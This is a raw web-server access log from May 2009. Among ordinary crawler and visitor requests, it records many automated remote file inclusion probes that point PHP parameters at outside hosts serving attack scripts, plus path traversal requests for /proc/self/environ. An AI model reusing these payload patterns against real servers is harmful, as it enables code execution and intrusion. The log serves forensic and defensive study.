123.143.98.5 - - [20/May/2009:06:08:45 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:08:45 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:08:45 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.147.29.190 - - [20/May/2009:06:09:06 -0400] "GET /logs/access_log.Q108112400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:33 -0400] "GET //login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:33 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:33 -0400] "GET /logs//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:37 -0400] "GET //login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:37 -0400] "GET /logs//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:37 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:39 -0400] "GET /logs/access_log.Q108110900%20%20//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:42 -0400] "GET /logs/access_log.Q108091400%20%20//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:43 -0400] "GET /logs/access_log.Q108110900%20%20//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:44 -0400] "GET /logs/access_log.Q108091400%20%20//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:09:51 -0400] "GET /logs/access_log.Q108090400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:09:57 -0400] "GET /logs/access_log.Q108110900%20%20//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:10:07 -0400] "GET /logs/access_log.Q108090200%20%20//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:10:09 -0400] "GET /logs/access_log.Q108090200%20%20//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:10:10 -0400] "GET /logs/access_log.Q108090400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:10:24 -0400] "GET /logs/access_log.Q108090200%20%20//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:10:35 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:10:35 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:10:35 -0400] "GET //skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:10:52 -0400] "GET //skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:10:52 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:10:52 -0400] "GET /logs/access_log.Q109042600//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
174.34.129.58 - - [20/May/2009:06:11:33 -0400] "GET /logs/access_log.Q108121400%20/test.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
72.30.142.171 - - [20/May/2009:06:11:45 -0400] "GET /logs/error_log.Q107060100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [20/May/2009:06:12:00 -0400] "GET /logs/access_log.Q108081800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:12:05 -0400] "GET /logs/access_log.Q108081800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:06:12:59 -0400] "GET /logs/access_log.Q109032000/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:12:59 -0400] "GET /index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:12:59 -0400] "GET /logs/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
208.94.173.99 - - [20/May/2009:06:13:01 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 265 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
208.94.173.99 - - [20/May/2009:06:13:01 -0400] "GET /logs/access_log.Q108062800/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.94.173.99 - - [20/May/2009:06:13:01 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 265 "-" "XXXXXX"
208.94.173.99 - - [20/May/2009:06:13:01 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 265 "-" "XXXXXX"
208.94.173.99 - - [20/May/2009:06:13:07 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
208.94.173.99 - - [20/May/2009:06:13:07 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
208.94.173.99 - - [20/May/2009:06:13:07 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.94.173.99 - - [20/May/2009:06:13:07 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.94.173.99 - - [20/May/2009:06:13:08 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "XXXXXX"
208.94.173.99 - - [20/May/2009:06:13:08 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 243 "-" "XXXXXX"
208.94.173.99 - - [20/May/2009:06:13:08 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "XXXXXX"
208.94.173.99 - - [20/May/2009:06:13:08 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "XXXXXX"
121.165.73.157 - - [20/May/2009:06:13:12 -0400] "GET /logs/access_log.Q108112400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:13:17 -0400] "GET /logs/access_log.Q109030200%20%20//cron.php?include_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:13:26 -0400] "GET /logs/access_log.Q108052400%20%20//cron.php?include_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.94.173.99 - - [20/May/2009:06:13:29 -0400] "GET /logs/access_log.Q108071500//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.94.173.99 - - [20/May/2009:06:13:29 -0400] "GET /logs/access_log.Q108071500/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
208.94.173.99 - - [20/May/2009:06:13:29 -0400] "GET /logs/access_log.Q108071500//doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 265 "-" "XXXXXX"
208.94.173.99 - - [20/May/2009:06:13:29 -0400] "GET /logs/access_log.Q108071500//doceboCms/class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 265 "-" "XXXXXX"
209.59.12.99 - - [20/May/2009:06:13:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.200.8.89 - - [20/May/2009:06:13:35 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:13:43 -0400] "GET /logs/access_log.Q109042600%20%20//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:06:13:47 -0400] "GET /logs/access_log.Q109032000/index2.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:13:47 -0400] "GET /index2.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:13:47 -0400] "GET /logs/index2.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:13:48 -0400] "GET /logs/access_log.Q108091900/index2.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.64.66.191 - - [20/May/2009:06:14:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
123.64.66.191 - - [20/May/2009:06:14:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA)"
218.1.64.133 - - [20/May/2009:06:14:26 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
218.1.64.133 - - [20/May/2009:06:14:26 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
218.1.64.133 - - [20/May/2009:06:14:26 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:06:14:26 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:06:14:27 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 230 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:06:14:27 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 225 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:06:14:28 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:06:14:28 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "XXXXXX"
174.34.129.58 - - [20/May/2009:06:14:33 -0400] "GET /logs/index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:14:33 -0400] "GET /logs/access_log.Q108121900/index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:14:33 -0400] "GET /index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:14:39 -0400] "GET /logs/error_log.Q108061500/index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:14:40 -0400] "GET /logs/access_log.Q108121900/index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:14:40 -0400] "GET /logs/index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:14:40 -0400] "GET /index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
208.64.202.134 - - [20/May/2009:06:14:43 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:14:43 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.34.129.58 - - [20/May/2009:06:14:45 -0400] "GET /logs/error_log.Q108061500/index2.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
209.200.8.89 - - [20/May/2009:06:14:50 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:15:00 -0400] "GET /logs/access_log.Q109051200%20%20//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.125.64.51 - - [20/May/2009:06:15:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.34.129.58 - - [20/May/2009:06:15:31 -0400] "GET /logs/access_log.Q109010700/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:15:31 -0400] "GET /logs/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:15:31 -0400] "GET /test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.820"
65.98.80.2 - - [20/May/2009:06:15:31 -0400] "GET /logs/access_log.Q109032000/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:31 -0400] "GET /index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:31 -0400] "GET /logs/access_log.Q109032000/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
174.34.129.58 - - [20/May/2009:06:15:31 -0400] "GET /logs/access_log.Q109042200/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:15:31 -0400] "GET /test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:15:31 -0400] "GET /logs/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.820"
65.98.80.2 - - [20/May/2009:06:15:32 -0400] "GET /logs/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
174.34.129.58 - - [20/May/2009:06:15:32 -0400] "GET /logs/access_log.Q109010700/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:15:32 -0400] "GET /logs/access_log.Q109042200/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
65.98.80.2 - - [20/May/2009:06:15:32 -0400] "GET /index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:32 -0400] "GET /logs/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
123.125.64.49 - - [20/May/2009:06:15:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
88.191.103.144 - - [20/May/2009:06:15:39 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 2095 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:15:39 -0400] "GET /logs/error_log.Q108102500////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:15:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:06:15:40 -0400] "GET /images/download_RCM_info.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
65.98.80.2 - - [20/May/2009:06:15:44 -0400] "GET /logs/access_log.Q109032000/main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:44 -0400] "GET /main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:44 -0400] "GET /logs/main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:53 -0400] "GET /logs/access_log.Q109050700/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
88.191.103.144 - - [20/May/2009:06:15:53 -0400] "GET /logs/error_log.Q108100400////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:06:15:54 -0400] "GET /logs/access_log.Q109032000/main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:54 -0400] "GET /main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:15:54 -0400] "GET /logs/main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:17:57 -0400] "GET /logs/access_log.Q109050700/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.144.106 - - [20/May/2009:06:17:59 -0400] "GET /logs/access_log.Q108090200//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:06:18:02 -0400] "GET /logs/access_log.Q109050700/index.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
216.151.134.36 - - [20/May/2009:06:18:03 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:18:03 -0400] "GET /logs/error_log.Q108102500////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:18:03 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 2095 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:18:08 -0400] "GET /logs/access_log.Q108090200//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:18:09 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:18:11 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.44.79.35 - - [20/May/2009:06:18:13 -0400] "GET //authentication/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.44.79.35 - - [20/May/2009:06:18:13 -0400] "GET /logs//authentication/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.44.79.35 - - [20/May/2009:06:18:13 -0400] "GET /logs/access_log.Q108090900//authentication/errors.php?error=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
